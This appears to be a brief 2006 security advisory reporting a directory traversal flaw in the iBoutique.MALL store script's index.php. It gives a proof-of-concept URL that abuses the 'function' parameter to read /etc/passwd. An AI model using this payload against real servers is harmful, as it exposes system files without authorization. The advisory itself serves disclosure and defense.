Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12854
HistoryMay 27, 2006 - 12:00 a.m.

iBoutique.MALL - Directory Traversal

2006-05-2700:00:00
vulners.com
11

iBoutique.MALL

Homepage: http://www.netartmedia.net/mall/

Description:
Based on iBoutique 4.0, iBoutique.MALL is a powerful multi user mall software solution. It makes
possible for the new vendors to signup and create their own customized online stores with ease.
Effected files: index.php

Directory Traversal accomplished by the function variable:
http://www.example.com/index.php?mod=search&function=/../../../../etc/passwd/